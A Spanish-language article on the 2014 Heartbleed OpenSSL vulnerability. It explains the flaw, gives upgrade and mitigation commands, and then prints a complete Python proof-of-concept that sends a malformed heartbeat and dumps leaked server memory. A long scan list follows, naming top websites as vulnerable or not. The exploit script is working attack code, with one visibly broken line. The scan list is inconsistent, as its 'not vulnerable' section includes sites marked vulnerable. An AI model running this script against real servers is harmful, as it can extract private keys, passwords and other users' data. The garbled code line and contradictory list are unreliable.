El recientemente fallo de seguridad (llamado HeartBleed), ha sido descubierto por Neel Mehta de la división de seguridad de Google, quien inmediatamente avisó a la organización OpenSSL, con el CVE reservado, CVE-2014-0160, que fue creado el 3 de Diciembre de 2013.

El grave bug permite a cualquier persona burlar los sistemas con versiones de OpenSSL 1.0.1 y 1.0.2-beta, incluidas las versiones 1.0.1f y 1.0.2-beta1. De esa manera se puede leer la memoria de los sistemas protegidos por esas versiones vulnerables. Esto pone en compromiso las claves secretas que se utilizan para identificar a los proveedores de servicios y para cifrar el tráfico, los nombres y contraseñas de usuarios, como así también otros datos como números de tarjetas de crédito…

Este fallo de seguridad afecta también a conexiones VPN que usen SSL, mensajería instantánea que use la librería OpenSSL y lo mismo pasa con Tor.

La información que se podría obtener sería la siguiente:

  • Claves privadas.
  • Usuarios y contraseñas utilizadas en servicios vulnerables.
  • Información sensible utilizada por servicios vulnerables.
  • Direcciones de memoria y su contenido que podría permitir evadir mecanismos de mitigación ante exploits.

¿Quieres comprobar si es vulnerable un sitio web o servidor?

Un consultor independiente de criptografía, italiano, Filippo Valsorda, preparó una página para comprobar si un servicio web es vulnerable a esta falla de seguridad heartbleed, y así poder comprobar si una web es vulnerable o no.

http://filippo.io/Heartbleed


¿Cómo corregir este fallo de seguridad?

El bug ha sido arreglado y publicado en Internet, es altamente recomendable realizar una actualización del software OpenSSL cuando antes.

Lo primero y más importante, actualizar la librería OpenSSL a una versión no vulnerable, a partir de la 1.0.1g. También se recomienda encarecidamente regenerar toda aquella información afectada, claves de usuarios, claves privadas… Esta tarea puede ser ardua y suponer un esfuerzo considerable, pero nadie nos asegura si, durante el período hasta la actualización de nuestros servicios vulnerables, pudiera haberse explotado este fallo para obtener de manera masiva información sensible.

Podemos comprobar nuestra versión instalada de las siguientes formas, mediante la terminal:

openssl version

ó

dpkg -l | grep openssl

Para actualizar la versión podemos usar el gestor de paquetes:

apt-get update
apt-get upgrade

o bien descargando el paquete de OpenSSL y compilandolo:

wget https://www.openssl.org/source/openssl-1.0.1g.tar.gz
tar -xvzf openssl-1.0.1g.tar.gz
cd openssl-1.0.1g
sudo ./config
sudo make && sudo make install

Otro método para su corrección consiste en deshabilitar el soporte de Heartbeat en OpenSSL, recompilándolo con la opción -DOPENSSL_NO_HEARTBEATS

En este enlace del GIT de openssl se pueden ver las modificaciones realizadas sobre los ficheros d1_both.c y t1_lib.c que solventarían esta grave vulnerabilidad.


Script Python

Código demostrativo de Jared Stafford en Python:

#!/usr/bin/env python2
 
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
 
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
 
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
 
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
 
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')
 
hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')
 
def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = ]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
         
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay
 
def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False
 
        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True
 
        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False
 
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
 
    if opts.starttls:
        re = s.recv(4096)
        if opts.debug: print re
        s.send('ehlo starttlstest\n')
        re = s.recv(1024)
        if opts.debug: print re
        if not 'STARTTLS' in re:
            if opts.debug: print re
            print 'STARTTLS not supported...'
            sys.exit(0)
        s.send('starttls\n')
        re = s.recv(1024)
     
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
 
    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
 
if __name__ == '__main__':
    main()

Analizando las 1.000 webs más famosas según Alexa

VULNERABLES

yahoo.com… vulnerable.
stackoverflow.com… vulnerable.
kickass.to… vulnerable.
flickr.com… vulnerable.
redtube.com… vulnerable.
sogou.com… vulnerable.
adf.ly… vulnerable.
outbrain.com… vulnerable.
archive.org… vulnerable.
addthis.com… vulnerable.
stackexchange.com… vulnerable.
popads.net… vulnerable.
avito.ru… vulnerable.
kaskus.co.id… vulnerable.
web.de… vulnerable.
suning.com… vulnerable.
zeobit.com… vulnerable.
beeg.com… vulnerable.
seznam.cz… vulnerable.
okcupid.com… vulnerable.
pch.com… vulnerable.
xda-developers.com… vulnerable.
steamcommunity.com… vulnerable.
slate.com… vulnerable.
scoop.it… vulnerable.
hidemyass.com… vulnerable.
123rf.com… vulnerable.
m-w.com… vulnerable.
dreamstime.com… vulnerable.
amung.us… vulnerable.
duckduckgo.com… not vulnerable.
leo.org… vulnerable.
eventbrite.com… vulnerable.
wetransfer.com… vulnerable.
sh.st… vulnerable.
entrepreneur.com… vulnerable.
zoho.com… vulnerable.
yts.re… vulnerable.
usmagazine.com… vulnerable.
fool.com… not vulnerable.
digitalpoint.com… vulnerable.
picmonkey.com… vulnerable.
petflow.com… vulnerable.
squidoo.com… vulnerable.
avazutracking.net… vulnerable.
elegantthemes.com… vulnerable.
500px.com… vulnerable.

NO VULNERABLES

google.com… not vulnerable.
facebook.com… not vulnerable.
youtube.com… not vulnerable.
yahoo.com… vulnerable.
baidu.com… no SSL.
wikipedia.org… not vulnerable.
qq.com… no SSL.
twitter.com… not vulnerable.
live.com… no SSL.
linkedin.com… no SSL.
taobao.com… no SSL.
amazon.com… not vulnerable.
google.co.in… not vulnerable.
sina.com.cn… no SSL.
blogspot.com… not vulnerable.
hao123.com… no SSL.
weibo.com… no SSL.
wordpress.com… not vulnerable.
yahoo.co.jp… no SSL.
vk.com… not vulnerable.
yandex.ru… not vulnerable.
ebay.com… no SSL.
bing.com… no SSL.
google.de… not vulnerable.
tmall.com… no SSL.
pinterest.com… not vulnerable.
sohu.com… not vulnerable.
google.co.uk… not vulnerable.
ask.com… no SSL.
360.cn… no SSL.
google.fr… not vulnerable.
google.co.jp… not vulnerable.
msn.com… no SSL.
instagram.com… not vulnerable.
tumblr.com… not vulnerable.
163.com… no SSL.
google.com.br… not vulnerable.
mail.ru… not vulnerable.
microsoft.com… no SSL.
paypal.com… not vulnerable.
soso.com… no SSL.
adcash.com… not vulnerable.
google.ru… not vulnerable.
xvideos.com… no SSL.
google.es… not vulnerable.
google.it… not vulnerable.
imdb.com… no SSL.
apple.com… no SSL.
imgur.com… not vulnerable.
cnn.com… no SSL.
neobux.com… not vulnerable.
craigslist.org… not vulnerable.
amazon.co.jp… not vulnerable.
google.com.hk… not vulnerable.
stackoverflow.com… vulnerable.
xhamster.com… not vulnerable.
google.com.mx… not vulnerable.
reddit.com… not vulnerable.
gmw.cn… no SSL.
ifeng.com… no SSL.
vube.com… not vulnerable.
go.com… no SSL.
bbc.co.uk… not vulnerable.
google.ca… not vulnerable.
blogger.com… not vulnerable.
fc2.com… not vulnerable.
xinhuanet.com… no SSL.
aliexpress.com… no SSL.
odnoklassniki.ru… not vulnerable.
alipay.com… no SSL.
akamaihd.net… no SSL.
alibaba.com… no SSL.
googleusercontent.com… no SSL.
wordpress.org… not vulnerable.
godaddy.com… no SSL.
google.com.tr… not vulnerable.
t.co… not vulnerable.
huffingtonpost.com… no SSL.
pornhub.com… not vulnerable.
google.com.au… not vulnerable.
about.com… no SSL.
people.com.cn… no SSL.
amazon.de… not vulnerable.
kickass.to… vulnerable.
youku.com… no SSL.
ebay.de… no SSL.
thepiratebay.se… not vulnerable.
espn.go.com… not vulnerable.
google.pl… not vulnerable.
blogspot.in… not vulnerable.
clkmon.com… not vulnerable.
dailymotion.com… not vulnerable.
flickr.com… vulnerable.
bp.blogspot.com… no SSL.
netflix.com… no SSL.
conduit.com… not vulnerable.
dailymail.co.uk… no SSL.
china.com… no SSL.
adobe.com… not vulnerable.
vimeo.com… no SSL.
xnxx.com… no SSL.
ebay.co.uk… no SSL.
livejasmin.com… no SSL.
rakuten.co.jp… no SSL.
cnet.com… no SSL.
themeforest.net… no SSL.
redtube.com… vulnerable.
indiatimes.com… no SSL.
uol.com.br… no SSL.
aol.com… no SSL.
m2newmedia.com… not vulnerable.
amazon.co.uk… not vulnerable.
dropbox.com… not vulnerable.
amazonaws.com… no SSL.
google.com.ar… not vulnerable.
google.com.sa… not vulnerable.
booking.com… not vulnerable.
youporn.com… not vulnerable.
slideshare.net… no SSL.
nytimes.com… no SSL.
pixnet.net… no SSL.
secureserver.net… no SSL.
google.com.eg… not vulnerable.
globo.com… no SSL.
buzzfeed.com… no SSL.
weather.com… no SSL.
canadaalltax.com… no SSL.
wikimedia.org… not vulnerable.
bbc.com… not vulnerable.
google.com.tw… not vulnerable.
sogou.com… vulnerable.
yelp.com… not vulnerable.
fiverr.com… not vulnerable.
google.com.pk… not vulnerable.
adf.ly… vulnerable.
flipkart.com… not vulnerable.
google.nl… not vulnerable.
mozilla.org… not vulnerable.
livejournal.com… not vulnerable.
ameblo.jp… no SSL.
hootsuite.com… not vulnerable.
directrev.com… no SSL.
wikia.com… not vulnerable.
blogfa.com… no SSL.
wikihow.com… no SSL.
outbrain.com… vulnerable.
theguardian.com… no SSL.
deviantart.com… not vulnerable.
espncricinfo.com… no SSL.
google.co.th… not vulnerable.
google.co.za… not vulnerable.
etsy.com… not vulnerable.
answers.com… not vulnerable.
foxnews.com… not vulnerable.
stumbleupon.com… not vulnerable.
livedoor.com… no SSL.
w3schools.com… no SSL.
archive.org… vulnerable.
gameforge.com… not vulnerable.
forbes.com… no SSL.
avg.com… no SSL.
files.wordpress.com… not vulnerable.
google.co.ve… not vulnerable.
torrentz.eu… not vulnerable.
bankofamerica.com… not vulnerable.
soundcloud.com… not vulnerable.
4shared.com… not vulnerable.
naver.com… no SSL.
badoo.com… not vulnerable.
aweber.com… not vulnerable.
mediafire.com… not vulnerable.
so.com… no SSL.
sourceforge.net… not vulnerable.
salesforce.com… not vulnerable.
addthis.com… vulnerable.
bet365.com… no SSL.
reference.com… no SSL.
spiegel.de… no SSL.
chase.com… not vulnerable.
liveinternet.ru… not vulnerable.
blogspot.com.br… not vulnerable.
github.com… not vulnerable.
indeed.com… not vulnerable.
onclickads.net… not vulnerable.
google.gr… not vulnerable.
loading-delivery1.com… no SSL.
statcounter.com… not vulnerable.
skype.com… no SSL.
ask.fm… no SSL.
hostgator.com… not vulnerable.
google.co.id… not vulnerable.
google.com.co… not vulnerable.
shutterstock.com… no SSL.
china.com.cn… no SSL.
stackexchange.com… vulnerable.
google.com.vn… not vulnerable.
mailchimp.com… not vulnerable.
onet.pl… not vulnerable.
quikr.com… not vulnerable.
allegro.pl… no SSL.
popads.net… vulnerable.
google.be… not vulnerable.
zillow.com… not vulnerable.
walmart.com… no SSL.
nicovideo.jp… no SSL.
google.com.ng… not vulnerable.
google.com.ua… not vulnerable.
gamer.com.tw… no SSL.
wsj.com… not vulnerable.
wellsfargo.com… not vulnerable.
wordreference.com… no SSL.
softonic.com… no SSL.
wix.com… no SSL.
tripadvisor.com… not vulnerable.
tube8.com… no SSL.
chinaz.com… no SSL.
bild.de… no SSL.
telegraph.co.uk… not vulnerable.
pandora.com… not vulnerable.
google.se… not vulnerable.
hurriyet.com.tr… no SSL.
google.ro… not vulnerable.
goodgamestudios.com… no SSL.
ettoday.net… not vulnerable.
weebly.com… not vulnerable.
photobucket.com… no SSL.
php.net… not vulnerable.
google.dz… not vulnerable.
goo.ne.jp… no SSL.
doublepimp.com… not vulnerable.
9gag.com… not vulnerable.
rambler.ru… not vulnerable.
reuters.com… not vulnerable.
google.at… not vulnerable.
tianya.cn… no SSL.
zedo.com… not vulnerable.
google.com.ph… not vulnerable.
businessinsider.com… not vulnerable.
avito.ru… vulnerable.
warriorforum.com… no SSL.
taringa.net… not vulnerable.
naver.jp… no SSL.
blogspot.com.es… not vulnerable.
google.com.pe… not vulnerable.
myntra.com… not vulnerable.
ups.com… not vulnerable.
mashable.com… not vulnerable.
media.tumblr.com… not vulnerable.
domaintools.com… not vulnerable.
ku6.com… no SSL.
bleacherreport.com… not vulnerable.
leboncoin.fr… no SSL.
wp.pl… no SSL.
gmx.net… no SSL.
codecanyon.net… no SSL.
coccoc.com… no SSL.
goodreads.com… not vulnerable.
kaskus.co.id… vulnerable.
rt.com… not vulnerable.
twitch.tv… no SSL.
google.ch… not vulnerable.
ikea.com… no SSL.
comcast.net… no SSL.
pconline.com.cn… no SSL.
milliyet.com.tr… no SSL.
google.cl… not vulnerable.
y8.com… no SSL.
moz.com… not vulnerable.
google.pt… not vulnerable.
rediff.com… not vulnerable.
google.com.sg… not vulnerable.
usps.com… no SSL.
snapdeal.com… no SSL.
ndtv.com… no SSL.
dmm.co.jp… no SSL.
amazon.fr… not vulnerable.
ucoz.ru… no SSL.
usatoday.com… no SSL.
douban.com… no SSL.
disqus.com… not vulnerable.
acesse.com… not vulnerable.
youyuan.com… no SSL.
meetup.com… not vulnerable.
samsung.com… no SSL.
v1.cn… no SSL.
4dsply.com… not vulnerable.
rutracker.org… no SSL.
mercadolivre.com.br… no SSL.
bitly.com… not vulnerable.
google.com.bd… not vulnerable.
39.net… no SSL.
washingtonpost.com… no SSL.
babylon.com… no SSL.
rbc.ru… no SSL.
constantcontact.com… not vulnerable.
nbcnews.com… not vulnerable.
uploaded.net… not vulnerable.
hulu.com… not vulnerable.
fedex.com… not vulnerable.
mama.cn… no SSL.
thefreecamsecret.com… no SSL.
web.de… vulnerable.
hp.com… not vulnerable.
nih.gov… no SSL.
zol.com.cn… no SSL.
fbcdn.net… not vulnerable.
suning.com… vulnerable.
google.cz… not vulnerable.
intuit.com… not vulnerable.
ign.com… no SSL.
infusionsoft.com… not vulnerable.
baomihua.com… no SSL.
detik.com… not vulnerable.
time.com… not vulnerable.
clickbank.com… not vulnerable.
goal.com… no SSL.
marca.com… no SSL.
ehow.com… no SSL.
olx.in… no SSL.
scribd.com… not vulnerable.
bluehost.com… not vulnerable.
microsoftonline.com… no SSL.
histats.com… not vulnerable.
yaolan.com… no SSL.
hardsextube.com… not vulnerable.
ebay.in… no SSL.
varzesh3.com… no SSL.
speedtest.net… no SSL.
extratorrent.cc… not vulnerable.
webmd.com… no SSL.
xuite.net… not vulnerable.
chaturbate.com… not vulnerable.
github.io… no SSL.
it168.com… no SSL.
iqiyi.com… no SSL.
zeobit.com… vulnerable.
mobile01.com… no SSL.
bloomberg.com… not vulnerable.
gsmarena.com… no SSL.
free.fr… not vulnerable.
cj.com… no SSL.
huanqiu.com… no SSL.
xing.com… not vulnerable.
yesky.com… no SSL.
orange.fr… no SSL.
thefreedictionary.com… no SSL.
enet.com.cn… no SSL.
daum.net… no SSL.
libero.it… no SSL.
gateable.com… no SSL.
americanexpress.com… not vulnerable.
kooora.com… no SSL.
force.com… no SSL.
cnzz.com… no SSL.
ixxx.com… not vulnerable.
google.no… not vulnerable.
youjizz.com… no SSL.
zippyshare.com… not vulnerable.
hudong.com… no SSL.
hdfcbank.com… no SSL.
beeg.com… vulnerable.
motherless.com… not vulnerable.
tinyurl.com… not vulnerable.
zendesk.com… not vulnerable.
amazon.cn… not vulnerable.
google.co.kr… not vulnerable.
cloudfront.net… no SSL.
wideinfo.org… not vulnerable.
kakaku.com… no SSL.
google.co.hu… not vulnerable.
abcnews.go.com… not vulnerable.
xcar.com.cn… no SSL.
eazel.com… no SSL.
google.ie… not vulnerable.
icicibank.com… no SSL.
amazon.in… not vulnerable.
cbssports.com… no SSL.
repubblica.it… no SSL.
ameba.jp… not vulnerable.
nba.com… not vulnerable.
elpais.com… no SSL.
google.ae… not vulnerable.
battle.net… not vulnerable.
google.cn… no SSL.
yandex.ua… not vulnerable.
tmz.com… not vulnerable.
lifehacker.com… not vulnerable.
bestbuy.com… not vulnerable.
pof.com… not vulnerable.
getresponse.com… not vulnerable.
sharelive.net… not vulnerable.
jabong.com… not vulnerable.
bitauto.com… no SSL.
mysearchdial.com… not vulnerable.
goo.gl… not vulnerable.
feedly.com… not vulnerable.
lenta.ru… no SSL.
ad6media.fr… not vulnerable.
techcrunch.com… not vulnerable.
groupon.com… not vulnerable.
target.com… no SSL.
lemonde.fr… not vulnerable.
in.com… no SSL.
pchome.net… no SSL.
google.az… not vulnerable.
dell.com… no SSL.
w3.org… no SSL.
nydailynews.com… no SSL.
mgid.com… not vulnerable.
udn.com… no SSL.
upworthy.com… not vulnerable.
intoday.in… no SSL.
seznam.cz… vulnerable.
xe.com… not vulnerable.
ebay.com.au… no SSL.
list-manage.com… not vulnerable.
ci123.com… no SSL.
okcupid.com… vulnerable.
t-online.de… no SSL.
drudgereport.com… no SSL.
odesk.com… not vulnerable.
irctc.co.in… no SSL.
engadget.com… no SSL.
accuweather.com… no SSL.
gizmodo.com… not vulnerable.
aili.com… no SSL.
0427d7.se… no SSL.
elmundo.es… no SSL.
snapdo.com… no SSL.
google.dk… not vulnerable.
ebay.it… no SSL.
youdao.com… not vulnerable.
tagged.com… no SSL.
probux.com… not vulnerable.
lefigaro.fr… not vulnerable.
latimes.com… no SSL.
retailmenot.com… no SSL.
surveymonkey.com… not vulnerable.
uimserv.net… no SSL.
issuu.com… not vulnerable.
blackhatworld.com… no SSL.
istockphoto.com… not vulnerable.
livescore.com… no SSL.
justdial.com… no SSL.
doubleclick.com… not vulnerable.
google.co.il… not vulnerable.
plugrush.com… not vulnerable.
jrj.com.cn… no SSL.
b5m.com… no SSL.
searchfun.in… no SSL.
capitalone.com… not vulnerable.
subscene.com… no SSL.
google.fi… not vulnerable.
pch.com… vulnerable.
delta-search.com… no SSL.
caijing.com.cn… no SSL.
elance.com… not vulnerable.
joomla.org… no SSL.
freelancer.com… not vulnerable.
quora.com… not vulnerable.
att.com… not vulnerable.
abril.com.br… no SSL.
trovigo.com… no SSL.
trulia.com… no SSL.
naukri.com… not vulnerable.
gazeta.pl… no SSL.
ck101.com… no SSL.
blogspot.de… not vulnerable.
kwejk.pl… not vulnerable.
4399.com… no SSL.
teebik.com… not vulnerable.
sahibinden.com… no SSL.
xywy.com… no SSL.
digg.com… not vulnerable.
cntv.cn… no SSL.
mywebsearch.com… no SSL.
homedepot.com… no SSL.
2345.com… no SSL.
siteadvisor.com… not vulnerable.
zing.vn… not vulnerable.
ero-advertising.com… no SSL.
informer.com… not vulnerable.
onlinesbi.com… no SSL.
lenovo.com… not vulnerable.
eyny.com… no SSL.
mysearchresults.com… no SSL.
bestusefuldownloads.com… no SSL.
clixsense.com… not vulnerable.
youm7.com… not vulnerable.
jimdo.com… no SSL.
semrush.com… not vulnerable.
likes.com… not vulnerable.
wired.com… not vulnerable.
rapidgator.net… not vulnerable.
cpmterra.com… no SSL.
lady8844.com… no SSL.
webmoney.ru… no SSL.
oracle.com… not vulnerable.
mercadolibre.com.ar… no SSL.
mlb.com… no SSL.
google.com.my… not vulnerable.
fotolia.com… not vulnerable.
adnxs.com… no SSL.
empowernetwork.com… not vulnerable.
amazon.it… not vulnerable.
timeanddate.com… no SSL.
gome.com.cn… not vulnerable.
foursquare.com… not vulnerable.
habrahabr.ru… no SSL.
telexfree.com… not vulnerable.
newegg.com… no SSL.
shareasale.com… no SSL.
xda-developers.com… vulnerable.
expedia.com… no SSL.
ig.com.br… no SSL.
theblaze.com… no SSL.
2ch.net… no SSL.
irs.gov… no SSL.
commentcamarche.net… no SSL.
doorblog.jp… no SSL.
exoclick.com… no SSL.
java.com… not vulnerable.
ce.cn… no SSL.
sberbank.ru… no SSL.
typepad.com… not vulnerable.
taleo.net… not vulnerable.
corriere.it… no SSL.
ning.com… not vulnerable.
twimg.com… no SSL.
match.com… no SSL.
haber7.com… no SSL.
steampowered.com… not vulnerable.
google.sk… not vulnerable.
pcgames.com.cn… no SSL.
twoo.com… no SSL.
who.is… not vulnerable.
awesomehp.com… no SSL.
iminent.com… no SSL.
backpage.com… no SSL.
gutefrage.net… not vulnerable.
vnexpress.net… no SSL.
chip.de… no SSL.
systweak.com… no SSL.
rednet.cn… no SSL.
kinopoisk.ru… not vulnerable.
opensiteexplorer.org… no SSL.
xgo.com.cn… no SSL.
gc.ca… no SSL.
ria.ru… no SSL.
swagbucks.com… no SSL.
citibank.com… no SSL.
examiner.com… not vulnerable.
hypergames.net… no SSL.
ya.ru… no SSL.
adultfriendfinder.com… no SSL.
life.com.tw… not vulnerable.
houzz.com… not vulnerable.
etao.com… no SSL.
chexun.com… no SSL.
flipora.com… no SSL.
marketwatch.com… no SSL.
shaadi.com… not vulnerable.
mihanblog.com… no SSL.
blogspot.ru… not vulnerable.
myfreecams.com… no SSL.
bodybuilding.com… not vulnerable.
58.com… no SSL.
leadpages.net… not vulnerable.
taboola.com… not vulnerable.
evernote.com… not vulnerable.
hubspot.com… no SSL.
verizonwireless.com… no SSL.
kijiji.ca… no SSL.
urbandictionary.com… no SSL.
hatena.ne.jp… not vulnerable.
eonline.com… no SSL.
facenama.com… no SSL.
terra.com.br… not vulnerable.
ca.gov… no SSL.
independent.co.uk… no SSL.
altervista.org… no SSL.
mirror.co.uk… no SSL.
seesaa.net… not vulnerable.
pcbaby.com.cn… no SSL.
mobile.de… no SSL.
steamcommunity.com… vulnerable.
slate.com… vulnerable.
tickld.com… not vulnerable.
soku.com… no SSL.
webs.com… no SSL.
focus.de… not vulnerable.
oneindia.in… no SSL.
tukif.com… no SSL.
babytree.com… no SSL.
firedrive.com… not vulnerable.
clicksvenue.com… no SSL.
drtuber.com… no SSL.
pixiv.net… not vulnerable.
ebay.fr… no SSL.
qtrax.com… no SSL.
cbslocal.com… not vulnerable.
yellowpages.com… not vulnerable.
scoop.it… vulnerable.
asos.com… no SSL.
watchseries.lt… no SSL.
free-tv-video-online.me… not vulnerable.
mynet.com… no SSL.
hotels.com… no SSL.
movie4k.to… no SSL.
bloglovin.com… not vulnerable.
news.com.au… not vulnerable.
hidemyass.com… vulnerable.
hubpages.com… not vulnerable.
mercadolibre.com.mx… no SSL.
azlyrics.com… no SSL.
viralnova.com… no SSL.
kompas.com… no SSL.
tabelog.com… no SSL.
sakura.ne.jp… no SSL.
blogspot.jp… not vulnerable.
yoka.com… no SSL.
yac.mx… no SSL.
123rf.com… vulnerable.
rottentomatoes.com… not vulnerable.
amazon.es… not vulnerable.
citrixonline.com… no SSL.
chinabyte.com… no SSL.
linkbucks.com… no SSL.
m-w.com… vulnerable.
agoda.com… not vulnerable.
npr.org… not vulnerable.
wiktionary.org… not vulnerable.
ashleyrnadison.com… no SSL.
gawker.com… not vulnerable.
priceline.com… not vulnerable.
slickdeals.net… not vulnerable.
vk.me… not vulnerable.
templatemonster.com… not vulnerable.
dreamstime.com… vulnerable.
europa.eu… not vulnerable.
r10.net… not vulnerable.
realtor.com… no SSL.
mega.co.nz… not vulnerable.
gotomeeting.com… no SSL.
addmefast.com… no SSL.
tokobagus.com… no SSL.
majesticseo.com… not vulnerable.
kayak.com… no SSL.
ouedkniss.com… not vulnerable.
adscale.de… no SSL.
optmd.com… no SSL.
viadeo.com… not vulnerable.
coupons.com… no SSL.
amung.us… vulnerable.
smh.com.au… no SSL.
cbsnews.com… no SSL.
google.com.kw… not vulnerable.
linksynergy.com… no SSL.
wow.com… no SSL.
cnbc.com… not vulnerable.
google.kz… not vulnerable.
duckduckgo.com… not vulnerable.
eastday.com… no SSL.
moneycontrol.com… no SSL.
blogspot.com.tr… not vulnerable.
macys.com… not vulnerable.
privatehomeclips.com… not vulnerable.
youth.cn… no SSL.
website-unavailable.com… no SSL.
leo.org… vulnerable.
outlook.com… no SSL.
tudou.com… no SSL.
dict.cc… not vulnerable.
prntscr.com… not vulnerable.
howstuffworks.com… no SSL.
all-free-download.com… no SSL.
espnfc.com… no SSL.
nordstrom.com… no SSL.
filehippo.com… no SSL.
liveleak.com… no SSL.
yandex.com.tr… not vulnerable.
allrecipes.com… no SSL.
glassdoor.com… not vulnerable.
prestashop.com… not vulnerable.
sex.com… no SSL.
monster.com… no SSL.
tomshardware.com… no SSL.
bongacams.com… no SSL.
jqw.com… no SSL.
mp3skull.com… no SSL.
eventbrite.com… vulnerable.
squarespace.com… not vulnerable.
ancestry.com… no SSL.
mpnrs.com… not vulnerable.
bhaskar.com… not vulnerable.
lequipe.fr… no SSL.
traidnt.net… not vulnerable.
people.com… no SSL.
hupu.com… no SSL.
aparat.com… no SSL.
over-blog.com… no SSL.
chinatimes.com… no SSL.
wetransfer.com… vulnerable.
tradedoubler.com… no SSL.
google.lk… not vulnerable.
southwest.com… not vulnerable.
persianblog.ir… no SSL.
ehowenespanol.com… not vulnerable.
custhelp.com… not vulnerable.
clarin.com… not vulnerable.
renren.com… no SSL.
overstock.com… no SSL.
lanacion.com.ar… no SSL.
sh.st… vulnerable.
stockstar.com… no SSL.
narod.ru… no SSL.
google.bg… not vulnerable.
shopclues.com… not vulnerable.
softpedia.com… no SSL.
porn.com… no SSL.
sfgate.com… not vulnerable.
shopify.com… not vulnerable.
turbobit.net… not vulnerable.
vice.com… not vulnerable.
24h.com.vn… no SSL.
virgilio.it… no SSL.
cracked.com… not vulnerable.
searchengines.ru… not vulnerable.
linternaute.com… no SSL.
nuvid.com… no SSL.
gamefaqs.com… no SSL.
hespress.com… not vulnerable.
pcmag.com… no SSL.
google.co.nz… not vulnerable.
internethaber.com… no SSL.
as.com… no SSL.
jquery.com… not vulnerable.
zanox.com… not vulnerable.
delta-homes.com… no SSL.
imageshack.us… not vulnerable.
payoneer.com… not vulnerable.
entrepreneur.com… vulnerable.
appledaily.com.tw… no SSL.
behance.net… no SSL.
bestblackhatforum.com… no SSL.
nownews.com… no SSL.
youtube-mp3.org… no SSL.
wunderground.com… no SSL.
zoho.com… vulnerable.
reverso.net… no SSL.
autohome.com.cn… no SSL.
nifty.com… not vulnerable.
foxsports.com… no SSL.
vesti.ru… no SSL.
alarabiya.net… no SSL.
sapo.pt… not vulnerable.
haberturk.com… no SSL.
blogspot.com.ar… not vulnerable.
digikala.com… no SSL.
farsnews.com… no SSL.
csdn.net… not vulnerable.
indianrail.gov.in… no SSL.
bhphotovideo.com… not vulnerable.
jvzoo.com… not vulnerable.
interia.pl… not vulnerable.
echo.msk.ru… no SSL.
allocine.fr… no SSL.
yts.re… vulnerable.
ensonhaber.com… not vulnerable.
chron.com… not vulnerable.
haberler.com… no SSL.
airtel.in… no SSL.
immobilienscout24.de… no SSL.
gazeta.ru… no SSL.
mackolik.com… no SSL.
17ok.com… no SSL.
google.com.ec… not vulnerable.
qvo6.com… no SSL.
media-fire.org… not vulnerable.
idnes.cz… no SSL.
jd.com… no SSL.
usmagazine.com… vulnerable.
pravda.com.ua… no SSL.
worldstarhiphop.com… no SSL.
sape.ru… not vulnerable.
india.com… no SSL.
zappos.com… no SSL.
lowes.com… not vulnerable.
babycenter.com… no SSL.
avast.com… not vulnerable.
nouvelobs.com… not vulnerable.
9gag.tv… no SSL.
amazon.ca… not vulnerable.
pixlr.com… not vulnerable.
rightmove.co.uk… not vulnerable.
